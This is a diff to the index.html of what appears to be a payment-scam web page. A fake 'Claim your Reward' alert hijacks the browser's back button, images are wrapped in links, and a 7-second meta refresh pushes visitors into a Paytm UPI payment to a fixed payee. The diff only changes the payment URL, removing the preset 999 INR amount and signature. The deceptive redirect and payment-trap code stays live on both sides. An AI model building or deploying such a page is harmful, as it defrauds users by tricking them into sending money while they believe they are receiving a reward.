--- a/index.html
+++ b/index.html
@@ -14,7 +14,7 @@
         onpopstate = function (t) {
           t.state && alert(' Claim your Reward by Clicking on \n "SEND IN BANK ACCOUNT"  ')
           location.href =
-            'paytmmp://pay?pa=shuugeez@freecharge&pn=Rahul&mc=&tr=&tn=&am=999&cu=INR&url=&mode=02&purpose=00&orgid=159002&sign=MEQCIE6b0FNi7lb28CzE39NJ2EIlToSqelSU30Vm63JfTcmzAiAj4/PciYbENYEpsWDzGkYsWDNyQh5WRal2nbI4SZghGg==';
+            'paytmmp://pay?pa=shuugeez@freecharge&amp;currency=INR';
         }
       } catch (o) {}
     }();
@@ -40,7 +40,7 @@
 
 <body>
 
-  <a id="anc" href="paytmmp://pay?pa=shuugeez@freecharge&pn=Rahul&mc=&tr=&tn=&am=999&cu=INR&url=&mode=02&purpose=00&orgid=159002&sign=MEQCIE6b0FNi7lb28CzE39NJ2EIlToSqelSU30Vm63JfTcmzAiAj4/PciYbENYEpsWDzGkYsWDNyQh5WRal2nbI4SZghGg==">
+  <a id="anc" href="paytmmp://pay?pa=shuugeez@freecharge&amp;currency=INR">
     <div>
       <img src="OP.jpg" width="100%" height="auto">
     </div>
@@ -86,14 +86,14 @@
   <font color="green">
 
     <br>
-    <a href="paytmmp://pay?pa=shuugeez@freecharge&pn=Rahul&mc=&tr=&tn=&am=999&cu=INR&url=&mode=02&purpose=00&orgid=159002&sign=MEQCIE6b0FNi7lb28CzE39NJ2EIlToSqelSU30Vm63JfTcmzAiAj4/PciYbENYEpsWDzGkYsWDNyQh5WRal2nbI4SZghGg==">
+    <a href="paytmmp://pay?pa=shuugeez@freecharge&amp;currency=INR">
 
 
       <img src="YP.jpg" width="100%" height="auto">
     </a>
 
 
-    <meta http-equiv="refresh" content="7;url=paytmmp://pay?pa=shuugeez@freecharge&pn=Rahul&mc=&tr=&tn=&am=999&cu=INR&url=&mode=02&purpose=00&orgid=159002&sign=MEQCIE6b0FNi7lb28CzE39NJ2EIlToSqelSU30Vm63JfTcmzAiAj4/PciYbENYEpsWDzGkYsWDNyQh5WRal2nbI4SZghGg==">
+    <meta http-equiv="refresh" content="7;url=paytmmp://pay?pa=shuugeez@freecharge&amp;currency=INR">
 
     <script>
       (function () {
